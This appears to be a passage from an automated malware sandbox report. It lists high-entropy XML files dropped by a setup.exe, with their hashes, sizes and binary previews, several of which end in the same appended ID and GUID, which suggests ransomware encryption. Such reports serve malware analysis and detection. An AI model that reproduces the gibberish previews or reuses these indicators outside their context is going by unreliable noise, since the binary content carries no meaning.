              SSDEEP:96:gnzYHq2+fgVAnGZU/j6VA8j+5gOShcd3EIOYudiyBAeOpzire/FFzT8kOpKt75:gnzOOfgVKb6VAl8hc2IOFiy+mre/FFTL
              MD5:2DE121DE1F663CA75568BA44DF879AFB
              SHA1:64417D8D4EF585D783EC80A543942A34FBB6CDC4
              SHA-256:3E772D79536AF2D2355AA9501A0590AE0A6CC5C9A0D28FE5CB84CBC7AE030FE0
              SHA-512:95A3F44935834CA309ED20A104F7D79BC46D070E4112BABD8A1DD9B0BB9003A616C64B538D51AFFE072638684750B8F4454F4AED987889B721A4090A46951FF0
              Malicious:false
              Preview:<?xmla...59...M.>.)p.4.?.c*...#.H.X.......w.....}.t9...6..@;.Xas.|`*..3.:2.Pa;..WB.t.o...k....6..nXW....s...2..T.Q6..*IT{^.{......,.$^...=Z3G.X..P.S.zw^...j^.r.g.H)l..Pd....m..q...j..O.....Z...>......&...!..P9.z.AC5.S.Y6...Y.O.I...Mc..O.......Gt....2...R..D9W9...'..8nv7.Z.1.|....0n.Q.|.....U...>.a$.....1>...VD..3..e<......[,9.J.6...%..P....O.@nmC..n....Th_.f...e...b$.E.Z.,.a...."a...z...".6.h{].e4^...f6&.....o.B^9......o.......h.i+?.8w7@..qB4..q...hc....b.....^.......F.._~..A...|...E...AK4xr..>d40...z-$.;.......^8.\.....Y....m.7.)0..j!.Y.F.1...f0L..6.....\...B.OQ..^.&....J..........V.Y..~6w......%M..Z..%..k...F=..@4..Y.....K..e5.'..p......ku..<..I..iB#^lKo6.Ho....>flN@....8K.d3..J..\!. ..:&<,J......5..o.X>c.L.......N.-.yoG....v....#....&!"..........e.]2'(....V....h..vP....d.j......G.b.m.*_.lO......<$..Q...^..._.G.8y.l..K..L......%.].`..4..5......RJ..m..:....6B....b.M..Te...........m..~...s<.....!d.$.u...H.4..-.ly.Ho/.o....uH..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4787
              Entropy (8bit):7.9536299260526855
              Encrypted:false
              SSDEEP:96:SttlmPkbb605+/2bMmGWmlPcZUHxs4m1lW862jVMa4O3ohhRGxK:WNbF5+ubhG3lNCGq3o/RGc
              MD5:5D53D925BE71EB91C0BE07D9EE17A356
              SHA1:16A07F44606049C6D1EBDEE56B94D0FCDEAF2460
              SHA-256:9E5D8A5DF3146E066988907A29446597942B03EA03D1747DD109100C3720EF03
              SHA-512:EF2CCDD628D15EF6B2AA0CD0225549667515F853FF1E5EF56CCC103DA7C47FECA97FBDD65EE5797BD4481F05BA3E51E9611446E38072E33258D7E8FF6AB845E5
              Malicious:false
              Preview:<?xmlf2|......5Z..zo...E4=..*.IU4K...+..i...}...m.Hi}........'...m.0...A.....f.c.%...2-.......}..P..:.....=...F04f....ES .|.w...{.......LZ.5.K..\...f.s."..... ...i*..-3,.......n...J.P....[..=.VA......'x..w"....3.{......&.OI..T.B.?/.3Q1?d....T."%.z.......X.=.?.T6f...V:/...../..g.J(...\......=N..F...}....#.X.h1...?#.$0M../.g.rI-.bg2.B3...I..*_*..Xk5...v.).}...r.......N...mw!......\.d.9s+LX...q..eo^h.._.$.:.nv../......t\..R....hd.2.2...J.|........`......9.o..H8.C.?.<DJ.Np-E...^a.%pT.sV......:..MK..D..C.L.6..*^.>..Ba...O..K.HK.NI..{%\V.X..?.%.3.Z....^..+...Od...-......B]s......8Y<..5...B=.c....!..=.......X.h.>i.6].3....IR.{.3I.vgs{,.`e.:...d..i5...WA".Q.L.x7......y...dt.@n^@K.L.....&.e$.............G.M~y.d...U...`..tR..S.o.C~E.b.n.Q?|.Q...Dy.N.3.....[.......5.76.k...."....a./...u.)>ML..e.........b..EX.i;.K....N5R.<>.7......8-.TC.+...}E .!.a..|[.O.W.$..wEv.O...4..5..D.1.p.0...]..Q...2..f%.k5..)...._...Q..#K.=....bZZ.......~F.......d...2n6=2.k..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4786
              Entropy (8bit):7.9601735621259015
              Encrypted:false
              SSDEEP:96:DbqtppoVWs9o42+XHlDWIZICHHHUCV2JqNcsLOi6T+00uvOzq6myZG:gpoVl9bq9qHHtV4qIi6TH0uJzys
              MD5:2CF381FA1A245654D9AB81980F50D87F
              SHA1:9E236F1D4D821A16F0CC5A8E02002E3F99867764
              SHA-256:3BCC23D11EC968DA427EE30E428BE82B40752EB51F8AC4AD2A10E828D6DBC4CE
              SHA-512:AA9970583F80722FD59912B7F8E70FC590147D3EBA451B823608956486C9ADFD027FC5254FFF0B242A8CCB0594143B14972BCE93212F8928D49D4D966B050435
              Malicious:false
              Preview:<?xml..+..e..hRU. .v..m.....91NH.._.y........E....].G..'......}H..kj?k....1..Jq._..I/....((..l.*.#.9..+%N...3?.v..h.......C..... ...!.@..XN/y......:.~.(..c.^p.R..Q..('....2^.h%.q.`.Pz....t.G8...;.S\..Cr.m.+../.H..1..d&.Jc..f..x.aL0..b...A.. .@. ...i.......9..<..^..<G.eW/......[...?.z..N"g.Q.4i...h....7.......K..6s....[.:..m..*E.).....K ...>....U.d..X!.X....o..4.W{.. ....?....g...*.....b.<.f.|g..l...o.R..J.....G....bx;Vk..S.L.b.\KX..i.^.~&..*.....z.Y.....2C....EGy.e.x/rB.....1._v.7`...V.%.rm...r.o......^........m......\......,.._....Ed.......x.,..`9a...T......".I......U......^....;.p.......D.........>.....zq.;1.[2...#~........\..rJ.Lv...&H.[..k3..~bG...~.>....L.X...wZ...F.o....5.....o..W%...JC...m.'....\.(?.....@.>.........kT.U.}.;.o_`(..>.].3.d.....@.-o....:.x...D..y.#2.Xre......!v..U....*.l..9No......W..u.)!AA{...^..gF...\.:?....)F..I.o.0..d.{..L/..UA.".....-.$,...H...5y.....Hk.....q...j..~.@...-7'..=V.2.P.zT2*....|U....p3....Q.E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3030
              Entropy (8bit):7.925729274062573
              Encrypted:false
              SSDEEP:48:2U87CzXRrwtaQyoVikS/wDNI6xT4hZaaRjRyETH5KSVBI+FiuwvnyD:2U8+6taQdc3BOqjP5PVBI+Fiu+a
              MD5:77541AAC5654EA0C72F1E13423A0D7E1
              SHA1:C0A3AD478794F9FC9A08A40C6953830BA8B56381
              SHA-256:C29E71EE5AB52994B5E0D14B6D1EDCECE107F13731B11C946CA570B2FB464707
              SHA-512:423E9A55191A00C4A898CF7522DB75CE807F514B2C588CE91D7224CD223B124A20862926F5B9F03AA4613A3773F08F08DFAA5989ABF0449E38B09162CFBE2B37
              Malicious:false
              Preview:<?xmlLiK..H*.s.\.g..MX0...%.-..[.D@#..u..^.ST.$H.f..<;)....E,..~....I.uvK.6a\._...>^wo(n[.V....`.c.....Q.<-......+.(qcp%C)..G.....0@.u.....&..R....<n..-D-4.j.@.p.s.q..Z..A.f........e._.{.....:....F....#P.P.Su...<....%K..(.]..K.8..-..#.._.s..(cSw..}..W.xa.K.U.,.......lj*.....C(L....!k...x...3J.7.o.n1.`...:....`Q6Bb.3....9.9$Y.C..R.)...u.NR7..cD...o.\......=.O..! .D.e..e..8..$.g.i;.2...%p.........o.P....}...z..$.b.93.q.w._.@u'..Sd-..c.........C......1D.!....p.U.\t.x.....^.@.3.f`Ji.....O.....?}`W+......3........j...b.C.4.F.#..e..`iK.,........p....uR.........+.Q.D.......\..fKi.2..9>A..O......7...ig.c..X..:.a.r.z..Wh>R....k?...]B.u2.....i.s....~..........6H.'.=......|..w.j......C...X.~"..s5hQ..zl....._,...K..".FU..@#1?...|p*./..y..N.b..K.......\..!a.p w~...u.S~oip{..._..3..jM.<e3.E.U.......f.#..]1'n..UC.lEr2..j.C.I..,..n.......-..v.M7..C?\....R.gr.+,2|"..."...F.'...x...#)m..._{L.4..G.../<,.....m_C.L.z.'m.D.+/...@..?..8+..T...{..b. .......}..U.`.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):789
              Entropy (8bit):7.729221762175452
              Encrypted:false
              SSDEEP:24:6qdNrm/tUkL8tGnjHwEk4rTyQv7sxxrSbD:6Srm/XLcSa4rTZvwrrAD
              MD5:98045C0C7F053CCD459EB3D28926F786
              SHA1:7D11DD2686221625538E668FC2DFEA13CBFEFB40
              SHA-256:82CCCD8CE0D0727637169D0A80BCD14BC5189274F56ED5C4B6729916748FB50D
              SHA-512:77FE28B570C841A1151109F5913C7BE7BFDF9320EEDA3AA2F87880D33A8832B714325D4C105F64B8AD64A10DA76B44DB7CB5D347351F475F35065263BB859F36
              Malicious:false
              Preview:<?xml....\.....,.#....Q...O....I..V.]..2.....72...]6w.*!..X=....t.....9(r...y...>....'..2.!h...}4..8qg. .(.4s4..Mm..Zo.c&@.......a.(Q@"$....r....,O..2..y.K0...!2&(*r..b!fLe..W(E.....Sv.Ek{..VJ...T@....?.'.CD.b..n.2KJp.B.....r.)_........i.!.s.D.=....3.U...QQ$...x..{.....@.........D.|..13.5......s.]A.,.F.U....@<!\....XF._..A.....d..R!fi)f....t2..s.T/...UM...b9.SR}|.g...k.....N#..].hz..t...Ht.T..';.6......F...u... W.~...o.].t.l^..6..h......07..w.x.yho.>_.Y}..)...vD,...1..F..........N^..b.]@U`....s..M....o.1.. .U..e(...y..S.kO....F..a.+....)......=/......ti..L.$t..<K....=...|E.......0...13.L.B.*..G+N..<;Q..9`}..^:}.p.l...R._..;......DBX.f.....S+....c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.936173902228758
              Encrypted:false
              SSDEEP:48:JCk8LBUeW0SLOlfipU3Dn0Gdcblkux6HDe6e5CsRUZwom5YCfN356d2D:JwUaeOopUoGUkukHi6epK8t13Adu
              MD5:82391A049D607E3714467CB179C9C324
              SHA1:CE3C6C0DD8F196D2BC7E2DF748EE0EF220F539FD
              SHA-256:52E488CAAA9973D28BB4093B97DC12C13FDF1F2B00ABE8C1A0329E22B62811D2
              SHA-512:6649DA9EF014D61CA16E6D02B843557692DDDC258037DFF190425F2A81B583A1741A2C501FB00DBAAF3643C1264A583D4653AB56A1C082FC0EC1A0F9D6C1BE42
              Malicious:false
              Preview:<?xml....... .d........~....tO.Ya...C..I..n\...E.Es..c...O.Y.nu....~O....H.A@.mJJ..M.T..u?..}.^._.:....<...5.3....i..&..a.V...=....rbG0..d&&v..7vz....;Q..L6.AT....cG...Okg..e.s.x..9..00...f"./..@.'...}..8..@.o.................>*|..s..]...kd.[..6....Mc............... Z..a........B._.-.g....(..,^.......B....TQ.3........T.K.R"......`..|..]....Kl..rT.C.4V/.O.L..c.....B.6._.X.kXj..v...+l...:....B...0.......%..E~|z.6.os.x+,....<\....Tv002..pu.cA.$..~.FAN!....rR.`.7.Wi.Vw..~....P.+.|....+:Ph.....}...6.".3..o..n.( .3.u5.ss...d..<.-..c,.|....f....07.C$..Z.#(|.(.....c._L.....hUlB^...N..y{K....A#d\*....5.qXK>....@.0`R.V.@v...t..jS...Vy(.Ae.w....y....IY.....$...G+..!....,.....V..?C....<....:..|.q...yuwj.n.I...Z..;.;J.+}..F.E{.3.G.....\...bw.....N..-1.N..<..#.......'.0.a..%......c....&.....w..C.p.....W.l...I..i.^.Q...x....x..U..>.....T..v..,.\ rPA_u....~..X.A.&......c..........{.o.5..c`.G.ma3.]+..L..n..SbS.d...~..`..c.g.n....}..f~2D.S........p.xs..|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):823
              Entropy (8bit):7.755443383697354
              Encrypted:false
              SSDEEP:12:OH0PXysJndpzbK/7v9t9ZkmtXQvfmaJjtn5GnoNgdD2EaZmMERiLnNUz9dnjfSsV:OUvtzKbfzExfGoNNEaU1iDuPjTbD
              MD5:BE0FAB3C2E1591001DF72CC57AB9C3EE
              SHA1:1B46B9079F0773F377FE685EA86517A30A3DD703
              SHA-256:3BA0E8B41EB0FA9B3F5C5B3C6D3AECE4E4BA7014794410978A0155AECD92C3A2
              SHA-512:7A5F822D6DD942F4C8EEA82E975B43107EF89EF9A9F25C2EF0CC79B973E76FB1BC3BCBD1BA7C6997D246CF90296F3E8B1FFABBC247DB982A556B6CEE056ECD2B
              Malicious:false
              Preview:<?xml.9...S.gg./....c.DY[..*;..7...$.#.;>^.!.^6"...N.&.#.SV....,zoNa.q....`..J..\.0...z.q..%+.2Z.D...%..;..........,Ff..bH.It..9.h.....gs..pE....Q2..D.41.oD.pV...W.=../..>.......\.l.n..f._.FA.gRY....I.,...j.:&]..VR.....?lA.Lt...c.m[..o.M.t...|.d..{E..,...A.j.m...G.6...|.R6.a.[.....c.ej...d<#....Jz..EA.2....~.d.8.....@l..z.'F!dq..(mvjiV{.Dh/.W...V......r....C.[..@.&...X.U."....B....l5...?...t.sl`.L..........$n......XT.P..@Y....xOf..1s.}95.......`..Q8....0...T...+...O.xl.....~.@..n-.....5d...|...w...i2.(# ../.8.qk.k....zuSu...).{dxR....d".2.kN.;X"PI.|u|......u..'.dyw[.D .f.s.....UG.aZ.......).Dd.3....q.~...m....u..K%...-~.:..$J.G.5.ew~2..t..@^p........i........Y.......K-B.J*%.!P....x..].A..y. ..-.C.4.sv...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.939727401538133
              Encrypted:false
              SSDEEP:48:7JBSCVPOvGCPhNYT+U0pzSKrRe//piBK7SNU8Qj4WmHHHNSf3TzdIHeSfkdlKU7Y:/rVCRppzte//YBOz8Qj4WmnHNSf3weEd
              MD5:D5A78331019B3B4341526E637C4187EC
              SHA1:92F05365BBB9B291DEB3BF39967BF9B33EB0139F
              SHA-256:789D7B01894222D48F6BDECD779A16479F8335DD6068B6C8C12E5A6698778AAB
              SHA-512:99523809D5719D57E586D9A479B60780644EF375B65503FD72757BCC0B0EE4EB1672BBFE3CE83D93922E64A938B7E35B4A62B961C7575C81F5078A5B08E053C0
              Malicious:false
              Preview:<?xml0........W......E)..L..VL2 .c'.L......d_.........G.T...E.Y..........D.Siywq.....'.a..?+R.<|..iz!..........T.;zH%....F{. M..K./k..hA.w..8.l..sk.Vzs|...}.F...m.p..N.+..&..,/w..2...P.+.w85....x..x.....l^..t..o..0G...|.s.~0.8.Q..o.QL.F........q.T.Q.I.=...`.g.W.l..S..._2..u..N...17.V..ObA..m...Bd...L.....L.s..G.Q...u..9h(..c..F...W.Z.%V..Kt.9...8........H.8....2..I+H.%.u..a...K.o...s..C....wo>./..5R^..................@..J.G..Z.&...zB.J1.f...v..VOqR..$.....Dq...5.....3....X>...2.M.1l...}o..n...._P47.&k.I...t.~......:#?..d5..}........Q..`RK+....EZ...N...4......^L....BjR..,....nA..:BI...m.l\........zz|F.)..'gW.Dy...^.`K.{..1cs...q\b.KO...=#...&X[9........'.........%.K..0;.I%..w.....w.w..>..Hf`.w..'xL.C.d....}.(.../..|sK..]...1T.m...9.b.de..-....7.{..z...U.,....Fau.*..%.....i.8C...l ........d.!i.....k.s...\sR7....E.`..).0F.{..u!/!(...".....h..'...I..dI.Vs?..2..U.;M..9......&...)I`....dc.z..{.ue?..v.........^c..'%.S.;.!4...3.....B.,MYF..Ls.|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1021
              Entropy (8bit):7.811049981452156
              Encrypted:false
              SSDEEP:24:q0qUBTtegHflTS3tkps5pZIjVTt6vLBqXpbqbD:q0qWTQg/pstIxx1bID
              MD5:F192FAC16B0369CAAFAE7175948A0E47
              SHA1:B1274DB74DA15342D5B2F8186ADC199647918291
              SHA-256:008A02C1F8E0D2BDEDCDB791EE156B1521104968590354C88B16975229BCD8EE
              SHA-512:B6AD38F2B3C274E0DCCBE2DE480F235D8FCB2A13EE7E425ECFDD1F7DE1B33D51197B2616DD3075926540641C4DC8665F0931D280EEAA122714A2A8E10399E047
              Malicious:false
              Preview:<?xmli....:........;..,..o.)S.....o..'S.%..........+F....:.<^...d..~Rc......;...=........^8Dd...4.C..S+.N...\..7{.]....Z.....*...E....#{.x...O@...O2...g..AK. .|..p&k...{...w..O.9.J...>....\..$gf..\mj..N...9lBh.....s...Cq...s..V..l.#.m..Hoi.}.......[2p.dQ..%...d.a4z].S2.5l.....t$....6$.@..fY...HG.P[ls...b#.a{{.a..8#.2.Z....'...'...3.kG...0..R..1.9`....v.4C1.N:.].eec33.......`\...h..<us..w ......^.Z..jA...!...b..<..p....t.UG.1b....h....a...)../X..;...$R..:..-}.\1.....-}_....c.O....hl?....'.f...M]..DV..e..dC%.E...g...R.........(...svV.2.].P..w.j......[X...%.5.W...j.ln..M=|.....v.......2...'..sa..?.3....aG..0sQ..k.Jm;4.......u...d0.J....o..N=......'..T..{.n9..C.W8s.{......'........s...<Y.7.......n...Ng..M.I.Jf....Wi"Y,).a(.T..E...B......0^.....k.-..1f~.n....^.....!......h....v.8..z..(<.....I<.....;.Q....%.v...4j....f.8j.0S.5..C..@........q@......A.F....K..M..u..O..mN...C~..Hh..={.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.8686353958420785
              Encrypted:false
              SSDEEP:24:JPqOVVdvl0xg0knMR5j0uH27DZKd7M2iK9jt33jXUVMYbD:xqOVVz0fMMsL1Aw2533jkmCD
              MD5:7DF332EDC593A745C9AAC98370326A8C
              SHA1:62DC45F21E9EA27994ADA84B0E3557BA7229A407
              SHA-256:B5947492159538AC53B41A547795EE2B162C2CA0107786446DBAF0CC3AE1C9F0
              SHA-512:2CB8CD784848AAD4D52181294B6315A1FDF4978279A63DF49FAB76829B45809DE2DD090BFC82315857AB4C39CEBB939620BB48A434EB1A9F3F6407A48B94B60F
              Malicious:false
              Preview:<?xmlhJ.awA$.E.r(xq........H..w)../... .v..Z.{A..+..R..2.*.*K.a4..../..;.y...[...*..Q..u.....V..A-.3.4K.o5...t .rK.v.. .n;%UO;.:...lz.E.W+T.... ...LM,.S.6.."LEeET+k....._.-.l?..>......f..3.<n.;o.t.k~.cu...,&.7..70...n.(....E.O.< ................!.}b..,..L..J.pd)...t^.a.W..n.D..c#Ap......U.N.0B[......... +_.o]V..>M..s.F..J'..T...rg...~.ZF.[....5W...c..F..I..H...U.53.....I.}.r\_.%S...w..V..].D".h..:..../..Bd...&5.@G..b.h..S],.B0f.d."...z......D..%."q."..T3.R.;...H.........z'.N...$Xn...T..>.'eT.z....8..P.F.re...3.SW..b..d.k>2m...~._..Y..U.H..M....`..j_.....Le....;..q.4...+..4.>.iK=.j[$...^...+z.P.!..v...`..%h.."..8........./...!VBR2=.....]...~.._{..6.....O.......O.@..{...1..>...<T.7.$.w."|..|......u..~...hQ.........k*.L.....`.....*...4.........iue)|..Q`.W..YJ......G.....T....M..4...?./&....:.:..q~..2.....Q..}...*.e6....:.<......JT......{.,...!.8^O.......\...mx.v.8.....w.....ES...gS.6.0......r..si..Vt.....D.Z.1>.xTF..\.d.85m....:M...jR.H.v...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):937
              Entropy (8bit):7.751753003087822
              Encrypted:false
              SSDEEP:24:KY3eSsvlPdAm2n3fz69rZZEPUEkGsIMnZd7H4ltNqlVE5uXUyubD:xjsvgmpXEcPLIMnZd7HytiE5kxMD
              MD5:36BDF1A6E1559987D77399F8FCC24575
              SHA1:D17ED487097E78C4F002488E45568015CEBB9018
              SHA-256:4ACCD32DEF8AF31C6462F91A85AAB071CD3ABC145F0CB672629D34EF0EAD3648
              SHA-512:E569DB1B664A9E6ED770726CE4E139ED0727AC6DDA25A738B011BA4ABD13B664FC7CD04BDFA1761E135E2BC6EABD24817DCEBF8BE23A1552B1E66F49D4722EE5
              Malicious:false
              Preview:<?xml...+A."N.ams.}0n.].aSQ...7.....A.0U.J?-......(x.d..j7k.F...G..,..?j*.K.....Ua=....Z#d9.'\...5..."g...;.t"...../....w>..pE.o...i.A..=.k.P....c..^.G.iv.@NJ]......O.b..X.....:..r.k...m.....Z..D..E.....ce..A2a6.....U......8.Ts_....[...D......boh.b....9=.....i...k ...Q].Zx.2.A..f..l..B..K........IZl.?$..0e..%Xu.h_v.,.9&..X.)3...?....8.a..dy.8n3.{'.K)_.,.">+.ci....mf..'..7i.....?yU..bmR.zam......."4.....5....-.5.b.F...F&.:).q..^.......ab..k7..g....K.p..5.8..|H5T..0..ZA...k.....ce.......mE....WJ~%&...']]j../1Z.(.....OM.3....8...vZq.?[#...D......pG...z.U....%.Z...f1-@`....f...J.y...yPm3...:;.@...Z7...npN>.5?W...L..1.K..._....ol]......N.sZ-.qw.....jO. .i..'......e....x.d.t..n>..Q9.}.}v.<y.?..r....k.0%....=.7>a..oxO.v.l.y.seN......'}...".....t.....%.XZ..h.3..p..a..3-Qz...J.<.....[Q..^..%.2v.v...?..B.J..$Y.4..B^....B..Xp.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):891
              Entropy (8bit):7.735940691971075
              Encrypted:false
              SSDEEP:12:t4KjalbuG2W345P7bPMIWplOaAMjAlDVvyrWATujthVrscixz19e/QybgElROQsV:JUu5r7jfWeDyryphVr5ixbMbgiR8bD
              MD5:DD0F9D9FF5BFC8ABCF22CB93FD01D366
              SHA1:7ECB8B7B3838D171CFF089BB83EC14A41EE9EACB
              SHA-256:E21B18873E530E5BD7E77F4066109DE339747EB3CC6AC67DDDC0CDC71AFD5BB7
              SHA-512:67B8D02F874D01655F73555DC08BFF8D737A69D5FC1E883EF223056581F58FD03D273EE9CE35C246EDE114F90FF62A990078A45C3499C80912FA7FA36C944A40
              Malicious:false
              Preview:<?xml..E.[....2@.]......Mh.4.....l8..S.*.l...K.xH.$`....6......80....s.>.4@..+^...^....8P*=.....P.-.../..............".DN.tR..f..:..r..D.vU.p/.....x.g["....].M.=H..;.Js)...2=.WE.UC..B....\.........^7.E.{+..}...I.y?.`.y..w.F.}...M...hL.;.N..T!Q?8.......=J......,.zS!..._.......k..Z.'J(.r..z....3.or..z..H....`...S.!.............02n>.0:..q.c.(SN..F...A.S..Z..`.L.....~._oG...P.g.&..|#.1...J.J-....D..[w...@..@p$..]......l.c..$L..-\..O......10.t...m.O.........U.11[........\...n.-K..}Y*....t..I...j...?.!...E.V.q`-.Q.M...D.x.Fn.......yz.j^..7 {M..F2.-w.8...x...\[T{...N_.f....p...bj..h......R.'W.o:G..J.../...`h..d.H..K.1/og.....,..O"...~{W..T..........d.....j._.r..-...:..S...]&.D.D.....fS\"..vB..E.XI...=.O.g..".bW.U.f........MY....Aq...3&.}.F.f......AA6..`.....`.bi.#..H.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1049
              Entropy (8bit):7.82749338961593
              Encrypted:false
              SSDEEP:24:IPmGyyvslqypdMb9G5f2qDFqhh/OFx0/diPAUlUWeFbD:IPmG90AypGb9G5Mh/OFGiYNVD
              MD5:3D1FD7AB5D57B7028D2820D8ED9FAB81
              SHA1:A029A02BC1EABA7B51EB0718423C2484BA141EDA
              SHA-256:39EF46DC9D7696F4681D4BBFB431409FB43BEAB0F3AC2A8D34601623FA6EC2E2
              SHA-512:A6B93FAB171772FC3455738CF2EAFD644F31E1BCE0FB72F9FBB9C2653C1D263D18A154F91286E41ECACFF6880FB29B5204EA2CE59B05F6F4DE2781BBEBFA9BB3
              Malicious:false
              Preview:<?xml*c.z.V|...$........`:...,|w..t.Vn..B?..]..q|..9..j..+....._......Jl4......7..q....H...Z1s..T.>..x..k.\..H..._..r?.|.[...\..rNxi.H........Kx...q..%#.qp.N...` ..e....),..6R.B#...{.|b.v..d.Pi....`..$.%..)....l..~{..;.......:.!PE.j..E..Sy.X,..a.*Zw..I{zO"..|mkn>W.q%JQ.....3L.`Hi4.".t....]`h........W.n.......vE.u.Q!.k.?...u....E..4P..l../.J...JPO..a.m...Y0...........XZ..\..}\.*..<........f..o.8......._..2[...|................}....Z..[|.....S..Y..?.oe$.nL6.z..6*.>..|.{(.L......!,a.7@.1y..^;...8z....p..!.F;......x.gi..G.......&..\.....M..5tR.5.D....7^K.....S.`%....q.(5....C.B.3.... .7Y.>QY4JQ.j.3.W....tX..KJ..I.x 9....,g...(.o9..U.O........28:....h....s.J'..AH.O..)D:.........%.=|a.;.X...8q.........dW...8.3..LmU ...@.s.......I....A.Y.".....A...r....,-;...U8..V..s.....|>.GN\......m..Q...(...|:..`....fY~.NP ...\......v.,#...~.!P.O..':R.$. ..[Q.p;.SR..:.N..Q.I....:...2..k...i.M..A.M...-.....Pi.7.;.PU....i.4W...P}.......AVrBq0iLIRHjQLgVRLsN1WK8yFkTCR
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):885
              Entropy (8bit):7.719126027961988
              Encrypted:false
              SSDEEP:24:3xg4pe99B1S6J9jS7x/eGp//d4Gow3r87KI5bD:3699BM8S7xmGpHd4w3MbD
              MD5:D15C646B9775FD19B3926B0D65821A9A
              SHA1:4F14A53B2AA73652E20F9E2D58183D076305754A
              SHA-256:2CB22E74133D91A8B2CAE129FD1CDEDAB49A2487A219F8A8BE84F174A16DBDF3
              SHA-512:94A46021C3CD4E3BF2D64A25D2E0611DBF95372EBE5D8DDDB236196BBB6FCF2099AA84088F997AFEEF8A1DEEAF6711E7B5E9874F49D9A7C48B869B765D9FE301
              Malicious:false
              Preview:<?xml.........kx...N.%O..K2.q4{\..~Ar.D..>.f.p.>.2.46.2.aGN...Y....G.....GC1., ...5d...P........^......J...=.k..W..$u..b\.J.-.]...{.G.T.0.s*H.v5...W........{....-....7p..O...N....~.ZY.:......4w...L...K<u...%7I.9...!.4I.9..s..0...D..9..l....}K...>I.-..6.........+.f7\..'v.N....../y.4......y<4...G..>..^.H....o..........8.....,...N..(..(......TM.p.@.gwz...r....8.f>...5'X.sT%Wg...!.)h.....G.../.^...K....k..T49t...m.e.`..x..[....W..i(59-:...%.KJ5....A.B..0f....3..+!8.lG..B;..b(.....\.)y.....E.).......DB....T..j9Hu~]..|. ..l..&....7..NL;..]........L......e8lQ8...-X.&P....{,.....t..E.+2.F.e.9.<v.3.u.A.....X=s.`......u\;2..Cv..,.6.Dp@.,C..9....%I...+.P.q.....-.n....y..~.6{........]. ...m.@..P..<.2.......M.hxb7..Jl...,.8Jg...Qs.......-^....'d...T.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1731
              Entropy (8bit):7.875412685919116
              Encrypted:false
              SSDEEP:48:0cdtmkIRU4fTc34kvVOAmX7qdZsdB6PTCKBDAGjD:JT4a4kv/mX73dULCKD
              MD5:4C271B479F5167B0060BEB2BC388806D
              SHA1:050F05C5F1FF199137A22F9E7559FA1490D89FC4
              SHA-256:96C5B0233D511B18D52208E67E2E9BBE4CAAF3A75652C43A356350E31B0BBC4B
              SHA-512:6B66FFD07DC6E19FC410B9AF9A346645743C21A1D0E5B4B6EDDA8C9280C2D2FC9F7B9B4FBC7AD9C5ED4FF5435B7287AA62B0A789C904E747F9CD63175FE0F1B0
              Malicious:false
              Preview:.<?.V..........Y{c...S..&U..}...U..pZ....P...]P..W...!../...,}S..8`~.k.;..d...R.N...8u....^.......E.'..![D;..D.k..../t\...p8#=T..s!.M.......8..6......>..."..i.1I?...U.3..G....s...X.queT.kv....r...j:qk.....].a.;b.....<.q.j.M|7E..]cEhu..>..m4.%C.54.z..j.O.l..5.(G.w6PW......Y.%A......E...4T....7...Y...CT1......]P.R......b*c..~z.]..w=...7j.,F.4...uT..n...4'.zwqPEOyH+....b8......... ......n[A....=....b#...G9.t.W........j.6r.7....4......Qy..0p..SV...O.x. B...[.:..Cz.E*.v.,x.1)....Y.......D.^.mf!...f.\..O....y.$4.l.o...e.0..uo.._..{...L..g.Q#...l...@bV....\.MY...ep...g6.^2,...t.-VPT..`...@.B...)|df."....u0@x..m...X.Q.[U...'..;..>....mGE.Z..1"'....1..'.v.E..k.Psx[.k..~..+1..q.. ..F..v.hK.v.A.1............Z......=Z......W\.|!....'./.QY4.iyg..G.`..#......TH.Ud!.uM....X.1.g.\!....g.....s...5g<J.I./..k..g.........."......Z].........p..R.o..I....Eo.iQ.....Kcd..@.i;E.v..z...eR.Y...&...a.n..T*n%.9....q....E...r........p...-).TT.a..s....|i....gNL..D.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1716
              Entropy (8bit):7.903484937842784
              Encrypted:false
              SSDEEP:48:blKDpU3ocvWwi7Qdkao9eIgzz5BGOSbZ0D:blKDcLvbUQVo9eIgzzS9q
              MD5:E4675193A6DBB167166BCF953EF503C9
              SHA1:7F52AB9FD836399F5A67CB5BC08674D23D876323
              SHA-256:94D2983D7960174218DA72E878D1221849860AFA9CACA1A8D19A1A45BC297139
